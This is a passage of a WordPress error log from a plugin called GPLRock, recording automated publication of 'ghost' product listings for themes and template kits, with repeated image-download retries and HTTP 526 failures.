manaka-architecture-interior-elementor-template-kit [05-Apr-2026 08:14:54 UTC] GPLRock: Image downloaded successfully for product maldives-business-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32dc8f97.webp [05-Apr-2026 08:14:55 UTC] GPLRock: Using pre-downloaded image for product maldives-business-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-32dc8f97.webp [05-Apr-2026 08:14:55 UTC] GPLRock: Ghost product published with image - Product ID: maldives-business-agency-elementor-template-kit [05-Apr-2026 08:14:56 UTC] GPLRock: Image downloaded successfully for product majang-personal-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71146f98.webp [05-Apr-2026 08:14:56 UTC] GPLRock: Using pre-downloaded image for product majang-personal-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-71146f98.webp [05-Apr-2026 08:14:56 UTC] GPLRock: Ghost product published with image - Product ID: majang-personal-portfolio-elementor-template-kit [05-Apr-2026 08:14:57 UTC] GPLRock: Image downloaded successfully for product maidy-cleaning-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3165d23.webp [05-Apr-2026 08:14:57 UTC] GPLRock: Using pre-downloaded image for product maidy-cleaning-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a3165d23.webp [05-Apr-2026 08:14:57 UTC] GPLRock: Ghost product published with image - Product ID: maidy-cleaning-service-elementor-template-kit [05-Apr-2026 08:14:59 UTC] GPLRock: Image downloaded successfully for product maglobe-magazine-news-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-828d7780.webp [05-Apr-2026 08:14:59 UTC] GPLRock: Using pre-downloaded image for product maglobe-magazine-news-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-828d7780.webp [05-Apr-2026 08:14:59 UTC] GPLRock: Ghost product published with image - Product ID: maglobe-magazine-news-elementor-template-kit [05-Apr-2026 08:15:00 UTC] GPLRock: Image downloaded successfully for product magcloud-hosting-domain-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af265c4e.webp [05-Apr-2026 08:15:00 UTC] GPLRock: Using pre-downloaded image for product magcloud-hosting-domain-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-af265c4e.webp [05-Apr-2026 08:15:00 UTC] GPLRock: Ghost product published with image - Product ID: magcloud-hosting-domain-elementor-template-kit [05-Apr-2026 08:15:02 UTC] GPLRock: Image downloaded successfully for product madoo-honey-bee-beekeeping-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-211dbd0f.jpg [05-Apr-2026 08:15:02 UTC] GPLRock: Using pre-downloaded image for product madoo-honey-bee-beekeeping-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-211dbd0f.jpg [05-Apr-2026 08:15:02 UTC] GPLRock: Ghost product published with image - Product ID: madoo-honey-bee-beekeeping-elementor-template-kit [05-Apr-2026 08:15:04 UTC] GPLRock: Image downloaded successfully for product lunar-esports-gaming-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71da53d7.webp [05-Apr-2026 08:15:04 UTC] GPLRock: Using pre-downloaded image for product lunar-esports-gaming-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-71da53d7.webp [05-Apr-2026 08:15:04 UTC] GPLRock: Ghost product published with image - Product ID: lunar-esports-gaming-elementor-template-kit [05-Apr-2026 08:16:42 UTC] GPLRock: Image download failed for product sns-market-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:44 UTC] GPLRock: Image download failed for product sns-market-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sns-market---woocommerce-wordpress-theme-16476.webp for product sns-market-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:16:46 UTC] GPLRock: Image download failed for product sns-market-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:48 UTC] GPLRock: Image download failed for product sns-market-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sns-market---woocommerce-wordpress-theme-16476.webp for product sns-market-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:16:50 UTC] GPLRock WARNING: Image download failed for product sns-market-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sns-market---woocommerce-wordpress-theme-16476.webp [05-Apr-2026 08:16:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sns-market-woocommerce-wordpress-theme [05-Apr-2026 08:16:50 UTC] GPLRock: Image download failed for product redboa-steakhouse-restaurant-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:52 UTC] GPLRock: Image download failed for product redboa-steakhouse-restaurant-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redboa---steakhouse-restaurant-wordpress-1616.webp for product redboa-steakhouse-restaurant-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:16:54 UTC] GPLRock: Image download failed for product redboa-steakhouse-restaurant-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:57 UTC] GPLRock: Image download failed for product redboa-steakhouse-restaurant-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:16:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/redboa---steakhouse-restaurant-wordpress-1616.webp for product redboa-steakhouse-restaurant-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:16:59 UTC] GPLRock WARNING: Image download failed for product redboa-steakhouse-restaurant-wordpress. URL: https://meldwp.com/wp-content/uploads/redboa---steakhouse-restaurant-wordpress-1616.webp [05-Apr-2026 08:16:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: redboa-steakhouse-restaurant-wordpress [05-Apr-2026 08:16:59 UTC] GPLRock: Image download failed for product dhora-movie-production-film-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:01 UTC] GPLRock: Image download failed for product dhora-movie-production-film-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhora--movie-production--film-studio-wordpress-theme-12797.webp for product dhora-movie-production-film-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:03 UTC] GPLRock: Image download failed for product dhora-movie-production-film-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:05 UTC] GPLRock: Image download failed for product dhora-movie-production-film-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dhora--movie-production--film-studio-wordpress-theme-12797.webp for product dhora-movie-production-film-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:07 UTC] GPLRock WARNING: Image download failed for product dhora-movie-production-film-studio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dhora--movie-production--film-studio-wordpress-theme-12797.webp [05-Apr-2026 08:17:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dhora-movie-production-film-studio-wordpress-theme [05-Apr-2026 08:17:07 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:09 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wowedding---wedding-oriented-wordpress-theme-26906.webp for product wowedding-wedding-oriented-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:12 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:14 UTC] GPLRock: Image download failed for product wowedding-wedding-oriented-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wowedding---wedding-oriented-wordpress-theme-26906.webp for product wowedding-wedding-oriented-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:16 UTC] GPLRock WARNING: Image download failed for product wowedding-wedding-oriented-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wowedding---wedding-oriented-wordpress-theme-26906.webp [05-Apr-2026 08:17:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wowedding-wedding-oriented-wordpress-theme [05-Apr-2026 08:17:16 UTC] GPLRock: Image download failed for product brabus-contemporary-portfolio-theme-for-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:18 UTC] GPLRock: Image download failed for product brabus-contemporary-portfolio-theme-for-agencies (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brabus--contemporary-portfolio-theme-for-agencies-15573.webp for product brabus-contemporary-portfolio-theme-for-agencies after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:20 UTC] GPLRock: Image download failed for product brabus-contemporary-portfolio-theme-for-agencies (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:22 UTC] GPLRock: Image download failed for product brabus-contemporary-portfolio-theme-for-agencies (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/brabus--contemporary-portfolio-theme-for-agencies-15573.webp for product brabus-contemporary-portfolio-theme-for-agencies after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:25 UTC] GPLRock WARNING: Image download failed for product brabus-contemporary-portfolio-theme-for-agencies. URL: https://meldwp.com/wp-content/uploads/brabus--contemporary-portfolio-theme-for-agencies-15573.webp [05-Apr-2026 08:17:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: brabus-contemporary-portfolio-theme-for-agencies [05-Apr-2026 08:17:25 UTC] GPLRock: Image download failed for product cybal-cyber-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:27 UTC] GPLRock: Image download failed for product cybal-cyber-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cybal---cyber-security-wordpress-theme-28505.webp for product cybal-cyber-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:29 UTC] GPLRock: Image download failed for product cybal-cyber-security-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:31 UTC] GPLRock: Image download failed for product cybal-cyber-security-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cybal---cyber-security-wordpress-theme-28505.webp for product cybal-cyber-security-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:33 UTC] GPLRock WARNING: Image download failed for product cybal-cyber-security-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cybal---cyber-security-wordpress-theme-28505.webp [05-Apr-2026 08:17:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cybal-cyber-security-wordpress-theme [05-Apr-2026 08:17:33 UTC] GPLRock: Image download failed for product liotta-a-responsive-blog-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:35 UTC] GPLRock: Image download failed for product liotta-a-responsive-blog-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liotta---a-responsive-blog-theme-for-wordpress-9565.webp for product liotta-a-responsive-blog-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:38 UTC] GPLRock: Image download failed for product liotta-a-responsive-blog-theme-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:40 UTC] GPLRock: Image download failed for product liotta-a-responsive-blog-theme-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/liotta---a-responsive-blog-theme-for-wordpress-9565.webp for product liotta-a-responsive-blog-theme-for-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:42 UTC] GPLRock WARNING: Image download failed for product liotta-a-responsive-blog-theme-for-wordpress. URL: https://meldwp.com/wp-content/uploads/liotta---a-responsive-blog-theme-for-wordpress-9565.webp [05-Apr-2026 08:17:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: liotta-a-responsive-blog-theme-for-wordpress [05-Apr-2026 08:17:42 UTC] GPLRock: Image download failed for product espresso-magazine-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:44 UTC] GPLRock: Image download failed for product espresso-magazine-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/espresso---magazine--newspaper-wordpress-theme-33271.webp for product espresso-magazine-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:46 UTC] GPLRock: Image download failed for product espresso-magazine-newspaper-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:48 UTC] GPLRock: Image download failed for product espresso-magazine-newspaper-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/espresso---magazine--newspaper-wordpress-theme-33271.webp for product espresso-magazine-newspaper-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:50 UTC] GPLRock WARNING: Image download failed for product espresso-magazine-newspaper-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/espresso---magazine--newspaper-wordpress-theme-33271.webp [05-Apr-2026 08:17:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: espresso-magazine-newspaper-wordpress-theme [05-Apr-2026 08:17:51 UTC] GPLRock: Image download failed for product bakery-wordpress-cake-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:53 UTC] GPLRock: Image download failed for product bakery-wordpress-cake-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bakery--wordpress-cake--food-theme-27926.webp for product bakery-wordpress-cake-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:55 UTC] GPLRock: Image download failed for product bakery-wordpress-cake-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:57 UTC] GPLRock: Image download failed for product bakery-wordpress-cake-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:17:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bakery--wordpress-cake--food-theme-27926.webp for product bakery-wordpress-cake-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:17:59 UTC] GPLRock WARNING: Image download failed for product bakery-wordpress-cake-food-theme. URL: https://meldwp.com/wp-content/uploads/bakery--wordpress-cake--food-theme-27926.webp [05-Apr-2026 08:17:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bakery-wordpress-cake-food-theme [05-Apr-2026 08:17:59 UTC] GPLRock: Image download failed for product itok-ico-and-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:01 UTC] GPLRock: Image download failed for product itok-ico-and-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/itok---ico-and-cryptocurrency-wordpress-theme-25780.webp for product itok-ico-and-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:04 UTC] GPLRock: Image download failed for product itok-ico-and-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:06 UTC] GPLRock: Image download failed for product itok-ico-and-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/itok---ico-and-cryptocurrency-wordpress-theme-25780.webp for product itok-ico-and-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:08 UTC] GPLRock WARNING: Image download failed for product itok-ico-and-cryptocurrency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/itok---ico-and-cryptocurrency-wordpress-theme-25780.webp [05-Apr-2026 08:18:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: itok-ico-and-cryptocurrency-wordpress-theme [05-Apr-2026 08:18:37 UTC] GPLRock: Image download failed for product ivyprep-education-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:40 UTC] GPLRock: Image download failed for product ivyprep-education-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ivyprep---education--school-wordpress-theme-16440.webp for product ivyprep-education-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:42 UTC] GPLRock: Image download failed for product ivyprep-education-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:44 UTC] GPLRock: Image download failed for product ivyprep-education-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ivyprep---education--school-wordpress-theme-16440.webp for product ivyprep-education-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:46 UTC] GPLRock WARNING: Image download failed for product ivyprep-education-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ivyprep---education--school-wordpress-theme-16440.webp [05-Apr-2026 08:18:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ivyprep-education-school-wordpress-theme [05-Apr-2026 08:18:46 UTC] GPLRock: Image download failed for product autorex-car-service-workshop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:48 UTC] GPLRock: Image download failed for product autorex-car-service-workshop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autorex---car-service--workshop-wordpress-theme-33477.webp for product autorex-car-service-workshop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:50 UTC] GPLRock: Image download failed for product autorex-car-service-workshop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:53 UTC] GPLRock: Image download failed for product autorex-car-service-workshop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/autorex---car-service--workshop-wordpress-theme-33477.webp for product autorex-car-service-workshop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:55 UTC] GPLRock WARNING: Image download failed for product autorex-car-service-workshop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/autorex---car-service--workshop-wordpress-theme-33477.webp [05-Apr-2026 08:18:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: autorex-car-service-workshop-wordpress-theme [05-Apr-2026 08:18:55 UTC] GPLRock: Image download failed for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:57 UTC] GPLRock: Image download failed for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:18:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/altaframe---drone-aerial-videography-and-photo-school-wordpress-theme-14940.webp for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:18:59 UTC] GPLRock: Image download failed for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:01 UTC] GPLRock: Image download failed for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/altaframe---drone-aerial-videography-and-photo-school-wordpress-theme-14940.webp for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:03 UTC] GPLRock WARNING: Image download failed for product altaframe-drone-aerial-videography-and-photo-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/altaframe---drone-aerial-videography-and-photo-school-wordpress-theme-14940.webp [05-Apr-2026 08:19:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: altaframe-drone-aerial-videography-and-photo-school-wordpress-theme [05-Apr-2026 08:19:03 UTC] GPLRock: Image download failed for product elsey-responsive-ecommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:05 UTC] GPLRock: Image download failed for product elsey-responsive-ecommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elsey---responsive-ecommerce-theme-17168.webp for product elsey-responsive-ecommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:08 UTC] GPLRock: Image download failed for product elsey-responsive-ecommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:10 UTC] GPLRock: Image download failed for product elsey-responsive-ecommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elsey---responsive-ecommerce-theme-17168.webp for product elsey-responsive-ecommerce-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:12 UTC] GPLRock WARNING: Image download failed for product elsey-responsive-ecommerce-theme. URL: https://meldwp.com/wp-content/uploads/elsey---responsive-ecommerce-theme-17168.webp [05-Apr-2026 08:19:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elsey-responsive-ecommerce-theme [05-Apr-2026 08:19:12 UTC] GPLRock: Image download failed for product bezin-pharmacy-health-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:14 UTC] GPLRock: Image download failed for product bezin-pharmacy-health-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bezin--pharmacy--health-woocommerce-wordpress-theme-30323.webp for product bezin-pharmacy-health-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:17 UTC] GPLRock: Image download failed for product bezin-pharmacy-health-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:19 UTC] GPLRock: Image download failed for product bezin-pharmacy-health-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bezin--pharmacy--health-woocommerce-wordpress-theme-30323.webp for product bezin-pharmacy-health-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:21 UTC] GPLRock WARNING: Image download failed for product bezin-pharmacy-health-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bezin--pharmacy--health-woocommerce-wordpress-theme-30323.webp [05-Apr-2026 08:19:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bezin-pharmacy-health-woocommerce-wordpress-theme [05-Apr-2026 08:19:21 UTC] GPLRock: Image download failed for product blokco-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:23 UTC] GPLRock: Image download failed for product blokco-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blokco---cryptocurrency-wordpress-theme-21413.webp for product blokco-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:25 UTC] GPLRock: Image download failed for product blokco-cryptocurrency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:28 UTC] GPLRock: Image download failed for product blokco-cryptocurrency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blokco---cryptocurrency-wordpress-theme-21413.webp for product blokco-cryptocurrency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:30 UTC] GPLRock WARNING: Image download failed for product blokco-cryptocurrency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blokco---cryptocurrency-wordpress-theme-21413.webp [05-Apr-2026 08:19:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blokco-cryptocurrency-wordpress-theme [05-Apr-2026 08:19:30 UTC] GPLRock: Image download failed for product blackdsn-creative-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:32 UTC] GPLRock: Image download failed for product blackdsn-creative-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackdsn---creative-ajax-portfolio-wordpress-theme-27846.webp for product blackdsn-creative-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:34 UTC] GPLRock: Image download failed for product blackdsn-creative-ajax-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:36 UTC] GPLRock: Image download failed for product blackdsn-creative-ajax-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 08:19:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blackdsn---creative-ajax-portfolio-wordpress-theme-27846.webp for product blackdsn-creative-ajax-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 08:19:38 UTC] GPLRock WARNING: Image download failed for product blackdsn-creative-ajax-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/blackdsn---creative-ajax-portfolio-wordpress-theme-27846.webp [05-Apr-2026 08:19:38 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blackdsn-creative-ajax-portfolio-wordpress-theme [05-Apr-2026 08:19:39 UTC] GPLRock: Image downloaded successfully for product rigel-ultimate-agency-portfolio-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13b52e81.webp [05-Apr-2026 08:19:39 UTC] GPLRock: Using pre-downloaded image for product rigel-ultimate-agency-portfolio-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-13b52e81.webp [05-Apr-2026 08:19:39 UTC] GPLRock: 